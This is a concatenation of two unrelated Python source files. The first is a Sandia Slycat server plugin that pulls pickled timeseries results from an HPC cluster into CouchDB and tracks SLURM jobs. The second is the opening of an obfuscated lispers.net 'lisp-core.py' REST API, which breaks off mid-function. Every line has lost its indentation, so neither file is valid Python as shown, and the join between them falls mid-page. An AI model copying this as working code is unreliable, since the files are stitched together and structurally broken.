# DE-NA0003525 with National Technology and Engineering Solutions of Sandia, LLC, the U.S. Government
# retains certain rights in this software.
def register_slycat_plugin(context):
"""Called during startup when the plugin is loaded."""
import cherrypy
import datetime
import time
import os
import json
import slycat.web.server
import threading
import sys
import traceback
import numpy
import re
import couchdb
import statistics
import io
import tarfile
try:
import cpickle as pickle
except ImportError:
import pickle
thread_pool={}
def media_columns(database, model, verb, type, command, **kwargs):
"""
Identify columns in the input data that contain media URIs (image or video).
:param kwargs:
:param command:
:param type:
:param verb:
:param model:
model ID in the data base
:param database:
our connection to couch db
"""
expression = re.compile("file://")
search = numpy.vectorize(lambda x: bool(expression.search(x)))
columns = []
metadata = slycat.web.server.get_model_arrayset_metadata(database, model, "inputs", "0")["arrays"][0]
for index, attribute in enumerate(metadata["attributes"]):
if attribute["type"] != "string":
continue
column = slycat.web.server.get_model_arrayset_data(database, model, "inputs", "0/%s/..." % index)
if not numpy.any(search(column)):
continue
columns.append(index)
cherrypy.response.headers["content-type"] = "application/json"
return json.dumps(columns)
def finish(model_id):
"""
Update the model in the databse as successfully completed.
:param model_id: uid of the model
"""
database = slycat.web.server.database.couchdb.connect()
model = database.get("model", model_id)
slycat.web.server.update_model(database, model, state="finished", result="succeeded",
finished=datetime.datetime.utcnow().isoformat(), progress=100, message="timeseries model finished uploading all data")
def fail_model(mid, message):
"""
Update the model as failed.
:param mid: model ID
:param message: reason for the model failure
"""
database = slycat.web.server.database.couchdb.connect()
model = database.get("model", mid)
slycat.web.server.update_model(database, model, state="finished", result="failed",
finished=datetime.datetime.utcnow().isoformat(), message=message)
def get_remote_file_server(hostname, model, filename, total_file_delta_time = [], calling_client=None):
"""
Utility function to fetch remote files.
:param hostname:
:param username:
:param filename: Full filename for the requested file
:return: tuple with session ID and file content
"""
sid = get_sid(hostname, model)
with slycat.web.server.remote.get_session(sid, calling_client) as session:
import time
start = time.time()
file = session.get_file(filename)
end = time.time()
delta_time = (end - start)
total_file_delta_time.append(delta_time)
return file
def get_sid(hostname, model):
"""
:param hostname:
:param model:
:return:
"""
sid = None
try:
database = slycat.web.server.database.couchdb.connect()
sessions = [session for session in database.scan("slycat/sessions") if
session["creator"] == model["creator"]]
if len(sessions) > 1:
cherrypy.log.error("to many user sessions %s" % str(sessions))
raise Exception("to many user sessions")
for index, host_session in enumerate(sessions[0]["sessions"]):
if host_session["hostname"] == hostname:
sid = host_session["sid"]
if(not slycat.web.server.remote.check_session(sid)):
cherrypy.log.error("error session %s SID:%s Keys %s" % (slycat.web.server.remote.check_session(sid), sid, list(slycat.web.server.remote.session_cache.keys())))
slycat.web.server.remote.delete_session(sid)
del session["sessions"][index]
database.save(session)
raise cherrypy.HTTPError("404")
break
except Exception as e:
cherrypy.log.error(traceback.format_exc())
cherrypy.log.error("Timeseries model compute exception type: %s" % sys.exc_info()[0])
cherrypy.log.error("Timeseries model compute exception value: %s" % sys.exc_info()[1])
cherrypy.log.error("Timeseries model compute exception traceback: %s" % sys.exc_info()[2])
cherrypy.log.error("could not retrieve host session for remotes %s" % e)
raise cherrypy.HTTPError("404")
if sid is None:
raise cherrypy.HTTPError("400 session is None value")
return sid
def helpGetFile(filename, use_tar, hostname, model, total_file_delta_time,calling_client, input_tar):
"""
help determin how to get a file either through
extracting from a tar file or from grabbing the file remotely
Arguments:
filename {[type]} -- file path
use_tar {[type]} -- flag for if it should use the tar
hostname {[type]} -- name of the host system
model {[type]} -- model from the DB
total_file_delta_time {[type]} -- array of file load times
calling_client {[type]} -- ip of the calling client
input_tar {[type]} -- tar file to read from
Returns:
file -- in memory file
"""
if use_tar:
return input_tar.extractfile(filename).read()
else:
return get_remote_file_server(hostname, model,
filename,
total_file_delta_time,
calling_client)
def compute(model_id, stop_event, calling_client):
"""
Computes the Time Series model. It fetches the necessary files from a
remote server that were computed by the slycat-agent-compute-timeseries.py
script.
:param model_id: uid for the model in the database
:param sid: session ID
:param uid: user ID
:param workdir:
:param hostname:
:param username:
"""
try:
total_file_delta_time = []
#cherrypy.log.error("in thread")
# workdir += "/slycat/pickle" # route to the slycat directory
start_time = time.time()
database = slycat.web.server.database.couchdb.connect()
model = database.get("model", model_id)
model["model_compute_time"] = datetime.datetime.utcnow().isoformat()
with slycat.web.server.get_model_lock(model["_id"]):
database.save(model)
slycat.web.server.update_model(database, model, state="waiting", message="starting data pull Timeseries")
model = database.get("model", model_id)
uid = slycat.web.server.get_model_parameter(database, model, "pickle_uid")
workdir_raw = slycat.web.server.get_model_parameter(database, model, "working_directory")
workdir = workdir_raw + "pickle"
hostname = slycat.web.server.get_model_parameter(database, model, "hostname")
username = slycat.web.server.get_model_parameter(database, model, "username")
# get an active session
sid = get_sid(hostname, model)
# load inputs
slycat.web.server.update_model(database, model, progress=50, message="loading inputs")
use_tar = True
# keep this blank unless we need it
pickle_path = ''
input_tar=None
try:
myfiles_tar_gz = get_remote_file_server(hostname, model,
"%s/slycat_timeseries_%s/slycat-timeseries.tar.gz" % (workdir, uid),
total_file_delta_time,
calling_client)
myfiles_tar_gz = io.BytesIO(myfiles_tar_gz)
input_tar = tarfile.open(fileobj=myfiles_tar_gz, mode="r:gz")
except:
# looks like the file is too large lets just grab one file at a time
use_tar = False
pickle_path = "%s/slycat_timeseries_%s/" % (workdir, uid)
inputs = helpGetFile("%sarrayset_inputs.pickle" % (pickle_path),
use_tar, hostname, model, total_file_delta_time,calling_client, input_tar)
inputs = pickle.loads(inputs)
# Decoding potential byte strings
class MyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, numpy.integer):
return int(obj)
elif isinstance(obj, numpy.floating):
return float(obj)
elif isinstance(obj, numpy.ndarray):
return obj.tolist()
elif type(obj) is bytes:
return str(obj.decode())
else:
return super(MyEncoder, self).default(obj)
inputs = json.loads(json.dumps(inputs, cls=MyEncoder))
slycat.web.server.put_model_arrayset(database, model, inputs["aid"])
# load attributes
slycat.web.server.update_model(database, model, progress=55, message="loading attributes")
attributes = inputs["attributes"]
slycat.web.server.put_model_array(database, model, inputs["aid"], 0, attributes, inputs["dimensions"])
# load attribute data
data = helpGetFile("%sinputs_attributes_data.pickle" % (pickle_path),
use_tar, hostname, model, total_file_delta_time,calling_client, input_tar)
attributes_data = pickle.loads(data)
# push attribute arraysets
# TODO this can become multi processored
for attribute in range(len(attributes)):
model = database.get("model", model["_id"])
slycat.web.server.put_model_arrayset_data(database, model, inputs["aid"], "0/%s/..." % attribute,
[attributes_data[attribute]])
# load clusters data
slycat.web.server.update_model(database, model, progress=60, message="loading cluster data")
clusters = helpGetFile("%sfile_clusters.json" % (pickle_path),
use_tar, hostname, model, total_file_delta_time,calling_client, input_tar)
clusters = json.loads(clusters)
clusters_file = json.JSONDecoder().decode(clusters["file"])
timeseries_count = json.JSONDecoder().decode(clusters["timeseries_count"])
slycat.web.server.post_model_file(model["_id"], True, sid,
"%s/slycat_timeseries_%s/file_clusters.out" % (workdir, uid),
clusters["aid"], clusters["parser"], client=calling_client)
# TODO this can become multi processored
cherrypy.log.error("Pulling timeseries computed data")
slycat.web.server.update_model(database, model, progress=65, message="Pulling timeseries computed data for %s cluster files" % len(clusters_file))
progress = 65
progress_part = 30/len(clusters_file)
for file_name in clusters_file:
progress = progress + progress_part
slycat.web.server.update_model(database, model, progress=progress, message="loading %s cluster file" % file_name)
file_cluster_data = helpGetFile("%sfile_cluster_%s.json" % (pickle_path, file_name),
use_tar, hostname, model, total_file_delta_time,calling_client, input_tar)
file_cluster_attr = json.loads(file_cluster_data)
slycat.web.server.post_model_file(model["_id"], True, sid,
"%s/slycat_timeseries_%s/file_cluster_%s.out" % (
workdir, uid, file_name),
file_cluster_attr["aid"], file_cluster_attr["parser"], client=calling_client)
database = slycat.web.server.database.couchdb.connect()
model = database.get("model", model["_id"])
slycat.web.server.put_model_arrayset(database, model, "preview-%s" % file_name)
waveform_dimensions_data = helpGetFile("%swaveform_%s_dimensions.pickle" % (pickle_path, file_name),
use_tar, hostname, model, total_file_delta_time,calling_client, input_tar)
waveform_dimensions_array = pickle.loads(waveform_dimensions_data)
waveform_attributes_data = helpGetFile("%swaveform_%s_attributes.pickle" % (pickle_path, file_name),
use_tar, hostname, model, total_file_delta_time,calling_client, input_tar)
waveform_attributes_array = pickle.loads(waveform_attributes_data)
waveform_times_data = helpGetFile("%swaveform_%s_times.pickle" % (pickle_path, file_name),
use_tar, hostname, model, total_file_delta_time,calling_client, input_tar)
waveform_times_array = pickle.loads(waveform_times_data)
waveform_values_data = helpGetFile("%swaveform_%s_values.pickle" % (pickle_path, file_name),
use_tar, hostname, model, total_file_delta_time,calling_client, input_tar)
waveform_values_array = pickle.loads(waveform_values_data)
for index in range(int(timeseries_count)):
try:
model = database.get("model", model["_id"])
slycat.web.server.put_model_array(database, model, "preview-%s" % file_name, index,
waveform_attributes_array[index],
waveform_dimensions_array[index])
model = database.get("model", model["_id"])
slycat.web.server.put_model_arrayset_data(database, model, "preview-%s" % file_name,
"%s/0/...;%s/1/..." % (index, index),
[waveform_times_array[index],
waveform_values_array[index]])
except:
cherrypy.log.error("failed on index: %s" % index)
pass
if input_tar:
input_tar.close()
database = slycat.web.server.database.couchdb.connect()
model = database.get("model", model_id)
slycat.web.server.update_model(database, model, message="finished loading all data")
slycat.web.server.put_model_parameter(database, model, "computing", False)
cherrypy.log.error("finished Pulling timeseries computed data")
finish_time = time.time()
file_stats = {
"min": min(total_file_delta_time),
"max": max(total_file_delta_time),
"mean": statistics.mean(total_file_delta_time),
"median": statistics.median(total_file_delta_time),
"number_of_files_pulled":len(total_file_delta_time),
"total_time_Pulling_data": sum(total_file_delta_time),
"total_time": (finish_time - start_time)
}
cherrypy.log.error("File Stats %s" % str(file_stats))
total_file_delta_time = []
finish(model["_id"])
stop_event.set()
# TODO add finished to the model state
# TODO add remove dir command by uncommenting below
# payload = {
# "action": "run_remote_command",
# "command": ("rm -rf %s" % workdir_raw)
# }
except cherrypy._cperror.HTTPError as e:
database = slycat.web.server.database.couchdb.connect()
model = database.get("model", model_id)
slycat.web.server.put_model_parameter(database, model, "computing", False)
cherrypy.log.error(traceback.format_exc())
cherrypy.log.error("Timeseries cperror model compute exception type: %s" % sys.exc_info()[0])
cherrypy.log.error("Timeseries model compute exception value: %s" % sys.exc_info()[1])
cherrypy.log.error("Timeseries model compute exception traceback: %s" % sys.exc_info()[2])
stop_event.set()
except:
database = slycat.web.server.database.couchdb.connect()
model = database.get("model", model_id)
slycat.web.server.put_model_parameter(database, model, "computing", False)
cherrypy.log.error(traceback.format_exc())
cherrypy.log.error("Timeseries model compute exception type: %s" % sys.exc_info()[0])
cherrypy.log.error("Timeseries model compute exception value: %s" % sys.exc_info()[1])
cherrypy.log.error("Timeseries model compute exception traceback: %s" % sys.exc_info()[2])
stop_event.set()
file = get_remote_file_server(hostname, model, "/home/%s/slurm-%s.out" % (username, model["artifact:jid"]),
total_file_delta_time,
calling_client)
pulling_time = finish_time - start_time
compute_start_time = file.decode('utf-8').split('[START]')
compute_finish_time = file.decode('utf-8').split('[FINISH]')
compute_run_time = file.decode('utf-8').split('[RUN TIME]')
database = slycat.web.server.database.couchdb.connect()
model = database.get("model", model_id)
model["model_delta_time"] = str(compute_run_time[1].split('\n')[0])
model["pulling_time"] = pulling_time
with slycat.web.server.get_model_lock(model["_id"]):
database.save(model)
def get_job_status(hostname, jid):
"""
returns the job status of a running timeseries job from the cluster called from a thread
:param tries: number of tries left to use this function
:param mid: model id
:param sid: session id for ssh
:param jid: job id for hpc
:param stop_event: thread stop event
:return:
"""
try:
response = slycat.web.server.handlers.get_checkjob(hostname, jid)
except Exception as e:
cherrypy.log.error("Something went wrong while checking on job %s status %s check ssh session" % (jid,str(e)))
return {"status": {"state": "ERROR"}}
return response
def update_remote_job(mid, jid, hostname, calling_client):
"""
Routine that checks on the status of remote
jobs running on a SLURM infrastructure.
:param mid: model ID
:param sid: session ID
:param jid: job ID
:param request_from:
:param stop_event: event stopping the thread when the job completes
:param callback: callback methods when the job successfully completes
"""
# get the status of the job
cherrypy.log.error("[Timeseries] Getting job status")
state = get_job_status(hostname, jid)["status"]["state"]
database = slycat.web.server.database.couchdb.connect()
model = database.get("model", mid)
if state == 'ERROR':
slycat.web.server.update_model(database, model, progress=0, message="Error")
slycat.web.server.put_model_parameter(database, model, "computing", False)
raise cherrypy.HTTPError("409 error connecting to check on the job")
cherrypy.log.error("[Timeseries] checkjob %s returned with status %s" % (jid, state))
if state in ["RUNNING", "PENDING"]:
if state == "RUNNING":
slycat.web.server.update_model(database, model, progress=10, message="Job is in pending state")
else:
slycat.web.server.update_model(database, model, progress=5, message="Job is in pending state")
slycat.web.server.put_model_parameter(database, model, "computing", False)
if "job_running_time" not in model and state == "RUNNING":
model = database.get("model", model["_id"])
model["job_running_time"] = datetime.datetime.utcnow().isoformat()
with slycat.web.server.get_model_lock(model["_id"]):
database.save(model)
if state in ["CANCELLED", "REMOVED", "VACATED"]:
slycat.web.server.put_model_parameter(database, model, "computing", False)
fail_model(mid, "Job %s was cancelled. Exit code %s" % (jid, state))
if state == "COMPLETED":
slycat.web.server.update_model(database, model, progress=50, message="Job is in Completed state")
if "job_running_time" not in model:
model = database.get("model", model["_id"])
model["job_running_time"] = datetime.datetime.utcnow().isoformat()
with slycat.web.server.get_model_lock(model["_id"]):
database.save(model)
if "job_completed_time" not in model:
model = database.get("model", model["_id"])
model["job_completed_time"] = datetime.datetime.utcnow().isoformat()
with slycat.web.server.get_model_lock(model["_id"]):
database.save(model)
"""
Callback for a successful remote job completion. It computes the model
and successfully completes it.
"""
cherrypy.log.error("calling compute")
# now start thread to prevent timing out on large files
stop_event = threading.Event()
# compute(model["_id"], stop_event, calling_client)
thread = threading.Thread(target=compute, args=(model["_id"], stop_event, calling_client))
thread_pool[model["_id"]] = thread
thread_pool[model["_id"]].start()
if state == ["FAILED", "UNKNOWN", "NOTQUEUED"]:
cherrypy.log.error("Something went wrong with job %s job state:" % (jid, state))
slycat.web.server.update_model(database, model, message="Job %s had returned a bad or unknown state from the hpc system" % jid)
slycat.web.server.put_model_parameter(database, model, "computing", False)
def update_model_info(database, model, verb, type, command, **kwargs):
"""
Starts a routine to continuously check the status of a remote job.
:param database:
:param model:
:param kwargs: arguments contain hostname, username, jid,
function name and parameters, UID
"""
slycat.web.server.update_model(database, model, progress=1, message="Job has been sent to slurm")
model_params = {
"working_directory": kwargs["working_directory"],
"username": kwargs["username"],
"hostname": kwargs["hostname"],
"pickle_uid": kwargs["uid"],
"jid": kwargs["jid"],
"fn": kwargs["fn"],
"fn_params": kwargs["fn_params"],
"job_submit_time": datetime.datetime.utcnow().isoformat()
}
for key, value in model_params.items():
slycat.web.server.put_model_parameter(database, model, key, value, input=False)
def pull_data(database, model, verb, type, command, **kwargs):
"""
check if a data pull is allowed
:param mid: model id
:return:
"""
calling_client = cherrypy.request.headers.get("x-forwarded-for")
database = slycat.web.server.database.couchdb.connect()
model = database.get("model", model["_id"])
try:
cherrypy.log.error("computing model value:" + str(slycat.web.server.get_model_parameter(database, model, "computing")))
if model["_id"] in thread_pool:
if thread_pool[model["_id"]].is_alive():
cherrypy.log.error("computing thread is alive for model %s"%str(model["_id"]))
else:
cherrypy.log.error("computing thread is dead for model %s setting compute to false"%str(model["_id"]))
del thread_pool[model["_id"]]
slycat.web.server.put_model_parameter(database, model, "computing", False)
else:
slycat.web.server.put_model_parameter(database, model, "computing", False)
except KeyError:
slycat.web.server.put_model_parameter(database, model, "computing", False)
model = database.get("model", model["_id"])
if model["state"] == "finished":
raise cherrypy.HTTPError("409 model is in the finished state already")
if not slycat.web.server.get_model_parameter(database, model, "computing"):
slycat.web.server.put_model_parameter(database, model, "computing", True)
update_remote_job(model["_id"], model["artifact:jid"], model["artifact:hostname"], calling_client)
cherrypy.response.headers["content-type"] = "application/json"
return json.dumps({'status': 'computing'})
else:
raise cherrypy.HTTPError("409 compute is currently still running.")
# Register our new model type
context.register_model("timeseries", finish)
# Register custom commands for use by wizards
context.register_model_command("GET", "timeseries", "pull_data", pull_data)
context.register_model_command("POST", "timeseries", "update-model-info", update_model_info)
context.register_model_command("GET", "timeseries", "media-columns", media_columns)
# Register a wizard for creating instances of the new model
context.register_wizard("timeseries", "New Timeseries Model", require={"action": "create", "context": "project"})
|
lisp-core.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-core.py
#
# This is the core process that is used to demux to the specific LISP
# functional components. The 4342 listen socket is centralized here.
#
#
# +------------- data encapsulation via network --------------+
# | |
# | IPC when mr & ms colocated |
# | +--------------------------------+ |
# | | | |
# | | IPC when mr & ddt colo | |
# | | +------------+ | |
# | | | | | |
# | | | v v v 4341
# +-------------+ +----------+ +----------+ +----------+ +----------+
# | lisp-[ir]tr | | lisp-mr | | lisp-ddt | | lisp-ms | | lisp-etr |
# +-------------+ +----------+ +----------+ +----------+ +----------+
# ^ IPC ^ IPC ^ IPC ^ IPC ^ IPC
# | | | | |
# | | | | |
# | | | | |
# +--------------+--------------+--------------+--------------+
# |
# | for dispatching control messages
# +-----------+
# | lisp-core |
# +-----------+
# | 4342
# |
# via network
#
# -----------------------------------------------------------------------------
from __future__ import division
from future import standard_library
standard_library . install_aliases ( )
from builtins import str
from past . utils import old_div
import lisp
import lispconfig
import multiprocessing
import threading
from subprocess import getoutput
import time
import os
import bottle
import json
import sys
import socket
if 64 - 64: i11iIiiIii
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
from cheroot . wsgi import Server as wsgi_server
from cheroot . ssl . builtin import BuiltinSSLAdapter as ssl_adaptor
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
if 60 - 60: iIii1I11I1II1 / i1IIi * oO0o - I1ii11iIi11i + o0oOOo0O0Ooo
if 94 - 94: i1IIi % Oo0Ooo
o0oO0 = ""
if 100 - 100: i1IIi
I1Ii11I1Ii1i = None
Ooo = None
o0oOoO00o = None
i1 = [ None , None , None ]
oOOoo00O0O = None
if 15 - 15: I1IiiI
if 90 - 90: IiII * i1IIi / Ii1I . OoO0O00 * oO0o
if 16 - 16: ooOoO0o * IiII % I11i . I1Ii111 / IiII % iII111i
if 27 - 27: IiII . i1IIi * OoOoOO00 % Ii1I / i1IIi
if 3 - 3: IiII / ooOoO0o
if 28 - 28: ooOoO0o + I1Ii111 - ooOoO0o . OoooooooOO
if 97 - 97: OoO0O00 . I11i
if 32 - 32: Oo0Ooo - II111iiii - i11iIiiIii % I1Ii111
@ bottle . route ( '/lisp/api' , method = "get" )
@ bottle . route ( '/lisp/api/<command>' , method = "get" )
@ bottle . route ( '/lisp/api/<command>/<data_structure>' , method = "get" )
def O0OoOoo00o ( command = "" , data_structure = "" ) :
iiiI11 = [ { "?" : [ { "?" : "not-auth" } ] } ]
if 91 - 91: o0oOOo0O0Ooo / II111iiii . I1ii11iIi11i + OOooOOo
if 47 - 47: OoOoOO00 / Ii1I * OoooooooOO
if 9 - 9: I1IiiI - Ii1I % i1IIi % OoooooooOO
if 3 - 3: iII111i + O0
if ( bottle . request . auth != None ) :
I1Ii , o0oOo0Ooo0O = bottle . request . auth
if ( lispconfig . lisp_find_user_account ( I1Ii , o0oOo0Ooo0O ) == False ) :
return ( json . dumps ( iiiI11 ) )
if 81 - 81: I1ii11iIi11i * IiII * I11i - iII111i - o0oOOo0O0Ooo
else :
if ( bottle . request . headers [ "User-Agent" ] . find ( "python" ) != - 1 ) :
return ( json . dumps ( iiiI11 ) )
if 90 - 90: II111iiii + oO0o / o0oOOo0O0Ooo % II111iiii - O0
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( json . dumps ( iiiI11 ) )
if 29 - 29: o0oOOo0O0Ooo / iIii1I11I1II1
if 24 - 24: O0 % o0oOOo0O0Ooo + i1IIi + I1Ii111 + I1ii11iIi11i
if 70 - 70: Oo0Ooo % Oo0Ooo . IiII % OoO0O00 * o0oOOo0O0Ooo % oO0o
if 23 - 23: i11iIiiIii + I1IiiI
if 68 - 68: OoOoOO00 . oO0o . i11iIiiIii
if 40 - 40: oO0o . OoOoOO00 . Oo0Ooo . i1IIi
if 33 - 33: Ii1I + II111iiii % i11iIiiIii . ooOoO0o - I1IiiI
if ( command == "data" and data_structure != "" ) :
O00oooo0O = bottle . request . body . readline ( )
if ( type ( O00oooo0O ) == bytes ) : O00oooo0O = O00oooo0O . decode ( )
iiiI11 = json . loads ( O00oooo0O ) if O00oooo0O != "" else ""
if ( iiiI11 != "" ) : iiiI11 = list ( iiiI11 . values ( ) ) [ 0 ]
if ( iiiI11 == [ ] ) : iiiI11 = ""
if 22 - 22: OoooooooOO % I11i - iII111i . iIii1I11I1II1 * i11iIiiIii
if ( type ( iiiI11 ) == dict and type ( list ( iiiI11 . values ( ) ) [ 0 ] ) == dict ) :
iiiI11 = list ( iiiI11 . values ( ) ) [ 0 ]
if 32 - 32: Oo0Ooo * O0 % oO0o % Ii1I . IiII
if 61 - 61: ooOoO0o
iiiI11 = oOOO00o ( data_structure , iiiI11 )
return ( iiiI11 )
if 97 - 97: I11i % I11i + II111iiii * iII111i
if 54 - 54: I11i + IiII / iII111i
if 9 - 9: OoOoOO00 / Oo0Ooo - IiII . i1IIi / I1IiiI % IiII
if 71 - 71: I1Ii111 . O0
if 73 - 73: OOooOOo % OoOoOO00 - Ii1I
if ( command != "" ) :
command = "lisp " + command
else :
O00oooo0O = bottle . request . body . readline ( )
if ( type ( O00oooo0O ) == bytes ) : O00oooo0O = O00oooo0O . decode ( )
if ( O00oooo0O == "" ) :
iiiI11 = [ { "?" : [ { "?" : "no-body" } ] } ]
return ( json . dumps ( iiiI11 ) )
if 10 - 10: I1IiiI % I1ii11iIi11i
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
iiiI11 = json . loads ( O00oooo0O )
command = list ( iiiI11 . keys ( ) ) [ 0 ]
if 20 - 20: o0oOOo0O0Ooo
if 77 - 77: OoOoOO00 / I11i
iiiI11 = lispconfig . lisp_get_clause_for_api ( command )
return ( json . dumps ( iiiI11 ) )
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
if 53 - 53: IiII + I1IiiI * oO0o
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
if 60 - 60: I11i / I11i
def I1II1III11iii ( ) :
iiiI11 = { }
iiiI11 [ "hostname" ] = socket . gethostname ( )
iiiI11 [ "system-uptime" ] = getoutput ( "uptime" )
iiiI11 [ "lisp-uptime" ] = lisp . lisp_print_elapsed ( lisp . lisp_uptime )
iiiI11 [ "lisp-version" ] = lisp . lisp_version
if 75 - 75: iIii1I11I1II1 / OOooOOo % o0oOOo0O0Ooo * OoOoOO00
iiii11I = "yes" if os . path . exists ( "./logs/lisp-traceback.log" ) else "no"
iiiI11 [ "traceback-log" ] = iiii11I
if 96 - 96: II111iiii % Ii1I . OOooOOo + OoooooooOO * oO0o - OoOoOO00
i11i1 = lisp . lisp_myrlocs [ 0 ]
IIIii1II1II = lisp . lisp_myrlocs [ 1 ]
i11i1 = "none" if ( i11i1 == None ) else i11i1 . print_address_no_iid ( )
IIIii1II1II = "none" if ( IIIii1II1II == None ) else IIIii1II1II . print_address_no_iid ( )
iiiI11 [ "lisp-rlocs" ] = [ i11i1 , IIIii1II1II ]
return ( json . dumps ( iiiI11 ) )
if 42 - 42: Ii1I + oO0o
if 76 - 76: I1Ii111 - OoO0O00
if 70 - 70: ooOoO0o
if 61 - 61: I1ii11iIi11i . I1ii11iIi11i
if 10 - 10: OoOoOO00 * iII111i . I11i + II111iiii - ooOoO0o * i1IIi
if 56 - 56: o0oOOo0O0Ooo * IiII * II111iiii
if 80 - 80: o0oOOo0O0Ooo * II111iiii % II111iiii
if 59 - 59: iIii1I11I1II1 + I1IiiI - o0oOOo0O0Ooo - I1IiiI + OOooOOo / I1ii11iIi11i
if 24 - 24: I11i . iII111i % OOooOOo + ooOoO0o % OoOoOO00
if 4 - 4: IiII - OoO0O00 * OoOoOO00 - I11i
if 41 - 41: OoOoOO00 . I1IiiI * oO0o % IiII
if 86 - 86: I1IiiI + Ii1I % i11iIiiIii * oO0o . ooOoO0o * I11i
if 44 - 44: oO0o
if 88 - 88: I1Ii111 % Ii1I . II111iiii
if 38 - 38: o0oOOo0O0Ooo
if 57 - 57: O0 / oO0o * I1Ii111 / OoOoOO00 . II111iiii
if 26 - 26: iII111i
def oOOO00o ( data_structure , data ) :
OOO = [ "site-cache" , "map-cache" , "system" , "map-resolver" ,
"map-server" , "database-mapping" , "site-cache-summary" ]
if 59 - 59: II111iiii + OoooooooOO * OoOoOO00 + i1IIi
if ( data_structure not in OOO ) : return ( json . dumps ( [ ] ) )
if 58 - 58: II111iiii * OOooOOo * I1ii11iIi11i / OOooOOo
if 75 - 75: oO0o
if 50 - 50: Ii1I / Oo0Ooo - oO0o - I11i % iII111i - oO0o
if 91 - 91: OoO0O00 / I11i - II111iiii . I11i
if ( data_structure == "system" ) : return ( I1II1III11iii ( ) )
if 18 - 18: o0oOOo0O0Ooo
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if ( data != "" ) : data = json . dumps ( data )
O0ooo0O0oo0 = lisp . lisp_api_ipc ( "lisp-core" , data_structure + "%" + data )
if 91 - 91: iIii1I11I1II1 + I1Ii111
if ( data_structure in [ "map-cache" , "map-resolver" ] ) :
if ( lisp . lisp_is_running ( "lisp-rtr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( O0ooo0O0oo0 , Ooo , "lisp-rtr" )
elif ( lisp . lisp_is_running ( "lisp-itr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( O0ooo0O0oo0 , Ooo , "lisp-itr" )
else :
return ( json . dumps ( [ ] ) )
if 31 - 31: IiII . OoOoOO00 . OOooOOo
if 75 - 75: I11i + OoO0O00 . OoOoOO00 . ooOoO0o + Oo0Ooo . OoO0O00
if ( data_structure in [ "map-server" , "database-mapping" ] ) :
if ( lisp . lisp_is_running ( "lisp-etr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( O0ooo0O0oo0 , Ooo , "lisp-etr" )
elif ( lisp . lisp_is_running ( "lisp-itr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( O0ooo0O0oo0 , Ooo , "lisp-itr" )
else :
return ( json . dumps ( [ ] ) )
if 96 - 96: OOooOOo . ooOoO0o - Oo0Ooo + iIii1I11I1II1 / OoOoOO00 * OOooOOo
if 65 - 65: Ii1I . iIii1I11I1II1 / O0 - Ii1I
if ( data_structure in [ "site-cache" , "site-cache-summary" ] ) :
if ( lisp . lisp_is_running ( "lisp-ms" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( O0ooo0O0oo0 , Ooo , "lisp-ms" )
else :
return ( json . dumps ( [ ] ) )
if 21 - 21: I1IiiI * iIii1I11I1II1
if 91 - 91: IiII
if 15 - 15: II111iiii
lisp . lprint ( "Waiting for api get-data '{}', parmameters: '{}'" . format ( data_structure , data ) )
if 18 - 18: i11iIiiIii . i1IIi % OoooooooOO / O0
if 75 - 75: OoOoOO00 % o0oOOo0O0Ooo % o0oOOo0O0Ooo . I1Ii111
III1iII1I1ii , oOOo0 , oo00O00oO , iIiIIIi = lisp . lisp_receive ( Ooo , True )
lisp . lisp_ipc_lock . release ( )
return ( iIiIIIi )
if 93 - 93: iII111i
if 10 - 10: I11i
if 82 - 82: I1ii11iIi11i - iIii1I11I1II1 / OOooOOo + Ii1I
if 87 - 87: oO0o * I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
if 83 - 83: I11i / I1IiiI
if 34 - 34: IiII
@ bottle . route ( '/lisp/api' , method = "put" )
@ bottle . route ( '/lisp/api/<command>' , method = "put" )
@ bottle . route ( '/lisp/api/<command>' , method = "delete" )
def oOo ( command = "" ) :
iiiI11 = [ { "?" : [ { "?" : "not-auth" } ] } ]
if ( bottle . request . auth == None ) : return ( iiiI11 )
if 75 - 75: I1IiiI + Oo0Ooo
if 73 - 73: O0 - OoooooooOO . OOooOOo - OOooOOo / OoOoOO00
if 45 - 45: iIii1I11I1II1 % OoO0O00
if 29 - 29: OOooOOo + Oo0Ooo . i11iIiiIii - i1IIi / iIii1I11I1II1
if ( bottle . request . auth != None ) :
I1Ii , o0oOo0Ooo0O = bottle . request . auth
